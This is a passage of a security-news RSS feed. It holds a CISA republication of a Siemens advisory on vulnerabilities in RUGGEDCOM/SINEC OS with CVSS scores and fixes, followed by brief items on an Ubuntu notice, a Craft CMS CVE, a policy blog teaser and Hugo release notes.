<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>2.9</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-25210</a></h3>
<div class="csaf-accordion-content">
<p>In libexpat before 2.7.4, the doContent function does not properly determine the buffer size bufSize because there is no integer overflow check for tag buffer reallocation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-25210">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.9</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L">CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-26157</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in BusyBox. Incomplete path sanitization in its archive extraction utilities allows an attacker to craft malicious archives that when extracted, and under specific conditions, may write to files outside the intended directory. This can lead to arbitrary file overwrite, potentially enabling code execution through the modification of sensitive system files.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-26157">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/73.html">CWE-73 External Control of File Name or Path</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-26158</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in BusyBox. This vulnerability allows an attacker to modify files outside of the intended extraction directory by crafting a malicious tar archive containing unvalidated hardlink or symlink entries. If the tar archive is extracted with elevated privileges, this flaw can lead to privilege escalation, enabling an attacker to gain unauthorized access to critical system files.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-26158">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/73.html">CWE-73 External Control of File Name or Path</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-35535</a></h3>
<div class="csaf-accordion-content">
<p>In Sudo through 1.9.17p2 before 3e474c2, a failure of a setuid, setgid, or setgroups call, during a privilege drop before running the mailer, is not a fatal error and can lead to privilege escalation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-35535">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/271.html">CWE-271 Privilege Dropping / Lowering Errors</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.4</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-41918</a></h3>
<div class="csaf-accordion-content">
<p>The affected applications stores sensitive information in the browser cache when an authenticated user modify specific configurations. This could allow an authenticated attacker to access sensitive data stored in the browser.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-41918">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/525.html">CWE-525 Use of Web Browser Cache Containing Sensitive Information</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.7</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Siemens ProductCERT reported these vulnerabilities to CISA.</li>
</ul>
<hr>
<h2>General Recommendations</h2>
<p>As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity</p>
<hr>
<h2>Additional Resources</h2>
<p>For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories</p>
<hr>
<h2>Terms of Use</h2>
<p>The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.</p>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability.</p>
<p>Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolate them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<hr>
<h2>Advisory Conversion Disclaimer</h2>
<p>This ICSA is a verbatim republication of Siemens ProductCERT SSA-253495 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.</p>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-06-02</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-06-02</td>
<td>1</td>
<td>Publication Date</td>
</tr>
<tr>
<td>2026-07-07</td>
<td>2</td>
<td>Initial CISA Republication of Siemens ProductCERT SSA-253495 advisory</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8515-1: Addressable vulnerability]]></title>
<description><![CDATA[It was discovered that Addressable incorrectly handled certain URI
templates, generating regular expressions vulnerable to catastrophic
backtracking. An attacker could use this issue to craft a URI that, when matched
against a vulnerable template, causes excessive resource consumption,
leading to...]]></description>
<link>https://tsecurity.de/de/3652238/unix-server/usn-8515-1-addressable-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652238/unix-server/usn-8515-1-addressable-vulnerability/</guid>
<pubDate>Tue, 07 Jul 2026 18:47:35 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that Addressable incorrectly handled certain URI
templates, generating regular expressions vulnerable to catastrophic
backtracking. An attacker could use this issue to craft a URI that, when matched
against a vulnerable template, causes excessive resource consumption,
leading to a denial of service.]]></content:encoded>
</item>
<item>
<title><![CDATA[Why Is a Cybersecurity Policy Important?]]></title>
<description><![CDATA[A cybersecurity policy is important because it defines how an organisation protects its systems, data and users from cyber threats. It establishes clear security rules, assigns responsibilities, supports regulatory compliance and helps employees make safer security decisions. A well-designed cybe...]]></description>
<link>https://tsecurity.de/de/3651104/it-security-nachrichten/why-is-a-cybersecurity-policy-important/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651104/it-security-nachrichten/why-is-a-cybersecurity-policy-important/</guid>
<pubDate>Tue, 07 Jul 2026 12:08:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="hs-featured-image-wrapper"> 
 <a href="https://www.cm-alliance.com/cybersecurity-blog/why-is-a-cybersecurity-policy-important" title="" class="hs-featured-image-link"> <img src="https://www.cm-alliance.com/hubfs/Cybersecurity_Policy_with_Blue_Orange_Text_on_Tech_Background_with_bgc.webp" alt="Cybersecurity Policy" class="hs-featured-image"> </a> 
</div> 
<p><span>A <a href="https://www.cm-alliance.com/cyber-security-policy-template">cybersecurity policy</a> is important because it defines how an organisation protects its systems, data and users from cyber threats. It establishes clear security rules, assigns responsibilities, supports regulatory compliance and helps employees make safer security decisions. A well-designed cybersecurity policy also strengthens cyber resilience by reducing risk and improving consistency across the organisation.</span><br></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-55794 | Craft CMS up to 5.9.x HTTP Request Header renderObjectTemplate special elements used in a template engine (GHSA-f74w-488g-8x5r / EUVD-2026-41213)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in Craft CMS up to 5.9.x. Affected by this issue is the function renderObjectTemplate of the component HTTP Request Header Handler. Performing a manipulation results in improper neutralization of special elements used in a template engine.

Th...]]></description>
<link>https://tsecurity.de/de/3650355/sicherheitsluecken/cve-2026-55794-craft-cms-up-to-59x-http-request-header-renderobjecttemplate-special-elements-used-in-a-template-engine-ghsa-f74w-488g-8x5r-euvd-2026-41213/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650355/sicherheitsluecken/cve-2026-55794-craft-cms-up-to-59x-http-request-header-renderobjecttemplate-special-elements-used-in-a-template-engine-ghsa-f74w-488g-8x5r-euvd-2026-41213/</guid>
<pubDate>Tue, 07 Jul 2026 04:51:00 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/craft:cms">Craft CMS up to 5.9.x</a>. Affected by this issue is the function <code>renderObjectTemplate</code> of the component <em>HTTP Request Header Handler</em>. Performing a manipulation results in improper neutralization of special elements used in a template engine.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-55794">CVE-2026-55794</a>. The attack is possible to be carried out remotely. No exploit exists.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[v0.164.0]]></title>
<description><![CDATA[Notes

tpl/resources: Deprecate resources.PostProcess in favour of templates.Defer 29ed932 @bep #15086

Changes

all: Rewrite deprecated constructs in tests 5a5f4a5 @bep
tpl/tplimpl: Support sub paths in layouts passed to .Render d83ce27 @bep #15056
Add markup.rst.syntaxHighlight option c6acc24 @...]]></description>
<link>https://tsecurity.de/de/3649553/downloads/v01640/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649553/downloads/v01640/</guid>
<pubDate>Mon, 06 Jul 2026 20:02:43 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Notes</h2>
<ul>
<li>tpl/resources: Deprecate resources.PostProcess in favour of templates.Defer <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/29ed93251312029ecf8cc51d0514a7c64895dce5/hovercard" href="https://github.com/gohugoio/hugo/commit/29ed93251312029ecf8cc51d0514a7c64895dce5"><tt>29ed932</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4808534793" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/15086" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/15086/hovercard" href="https://github.com/gohugoio/hugo/issues/15086">#15086</a></li>
</ul>
<h2>Changes</h2>
<ul>
<li>all: Rewrite deprecated constructs in tests <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/5a5f4a54952261fd3e28fda1a22128990e6bfdc6/hovercard" href="https://github.com/gohugoio/hugo/commit/5a5f4a54952261fd3e28fda1a22128990e6bfdc6"><tt>5a5f4a5</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a></li>
<li>tpl/tplimpl: Support sub paths in layouts passed to .Render <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/d83ce27ae01f992bbb86a338f6b599af35c33f9e/hovercard" href="https://github.com/gohugoio/hugo/commit/d83ce27ae01f992bbb86a338f6b599af35c33f9e"><tt>d83ce27</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4722577029" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/15056" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/15056/hovercard" href="https://github.com/gohugoio/hugo/issues/15056">#15056</a></li>
<li>Add markup.rst.syntaxHighlight option <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/c6acc246ab10df02f1655c226a1313a3a1d9cc81/hovercard" href="https://github.com/gohugoio/hugo/commit/c6acc246ab10df02f1655c226a1313a3a1d9cc81"><tt>c6acc24</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="373475864" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/5349" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/5349/hovercard" href="https://github.com/gohugoio/hugo/issues/5349">#5349</a></li>
<li>tpl/resources: Deprecate resources.PostProcess in favour of templates.Defer <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/29ed93251312029ecf8cc51d0514a7c64895dce5/hovercard" href="https://github.com/gohugoio/hugo/commit/29ed93251312029ecf8cc51d0514a7c64895dce5"><tt>29ed932</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4808534793" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/15086" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/15086/hovercard" href="https://github.com/gohugoio/hugo/issues/15086">#15086</a></li>
<li>tpl/collections: Include key in IsSet unsupported-type warning <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/671897ae918f4315dcaa36b3ff7431a14db5433b/hovercard" href="https://github.com/gohugoio/hugo/commit/671897ae918f4315dcaa36b3ff7431a14db5433b"><tt>671897a</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bejaratommy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bejaratommy">@bejaratommy</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2037231732" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/11794" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/11794/hovercard" href="https://github.com/gohugoio/hugo/issues/11794">#11794</a></li>
<li>create: Keep new content placeholders buildable <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/499794d19e306b490676306a89fc43668bfe1c4f/hovercard" href="https://github.com/gohugoio/hugo/commit/499794d19e306b490676306a89fc43668bfe1c4f"><tt>499794d</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjh9714/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjh9714">@sjh9714</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4799377216" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/15078" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/15078/hovercard" href="https://github.com/gohugoio/hugo/issues/15078">#15078</a></li>
<li>hugio: Speedup hasBytesWriter <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/65c82178b77dc0e0bfef9816c651be3567a983b7/hovercard" href="https://github.com/gohugoio/hugo/commit/65c82178b77dc0e0bfef9816c651be3567a983b7"><tt>65c8217</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a></li>
<li>tpl/crypto: Add crypto.Hash <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/dfb35dcd7a9ab9a6d8b6c0829c312f2e4d5f8b0d/hovercard" href="https://github.com/gohugoio/hugo/commit/dfb35dcd7a9ab9a6d8b6c0829c312f2e4d5f8b0d"><tt>dfb35dc</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4763470733" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/15072" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/15072/hovercard" href="https://github.com/gohugoio/hugo/issues/15072">#15072</a></li>
<li>Add encoding.HexDecode/Encode <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/a5ec54239312c160b82e303f159c4bdb2e030ab5/hovercard" href="https://github.com/gohugoio/hugo/commit/a5ec54239312c160b82e303f159c4bdb2e030ab5"><tt>a5ec542</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4759205811" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/15068" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/15068/hovercard" href="https://github.com/gohugoio/hugo/issues/15068">#15068</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4731332136" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/15060" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/15060/hovercard" href="https://github.com/gohugoio/hugo/issues/15060">#15060</a></li>
<li>tpl/tplimpl: Make template name lookup case-insensitive <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/e46d37a984db2efe1d4798c9fe79a6ec46365fdd/hovercard" href="https://github.com/gohugoio/hugo/commit/e46d37a984db2efe1d4798c9fe79a6ec46365fdd"><tt>e46d37a</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmooring/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmooring">@jmooring</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4727372960" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/15057" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/15057/hovercard" href="https://github.com/gohugoio/hugo/issues/15057">#15057</a></li>
<li>hugolib: Return error from .Render when template not found <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/fe067352140496afbb144206f33a47cad119709d/hovercard" href="https://github.com/gohugoio/hugo/commit/fe067352140496afbb144206f33a47cad119709d"><tt>fe06735</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmooring/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmooring">@jmooring</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4718798071" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/15052" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/15052/hovercard" href="https://github.com/gohugoio/hugo/issues/15052">#15052</a></li>
</ul>
<h2>Dependency Updates</h2>
<ul>
<li>build(deps): bump github.com/JohannesKaufmann/html-to-markdown/v2 <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/921db7b52c6aff737d308ff298cd2841ad4037e6/hovercard" href="https://github.com/gohugoio/hugo/commit/921db7b52c6aff737d308ff298cd2841ad4037e6"><tt>921db7b</tt></a> <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot]</li>
<li>build(deps): bump golang.org/x/tools from 0.45.0 to 0.47.0 <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/786ce71e59ac3f99ff9069711c62bc7dfde3731a/hovercard" href="https://github.com/gohugoio/hugo/commit/786ce71e59ac3f99ff9069711c62bc7dfde3731a"><tt>786ce71</tt></a> <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot]</li>
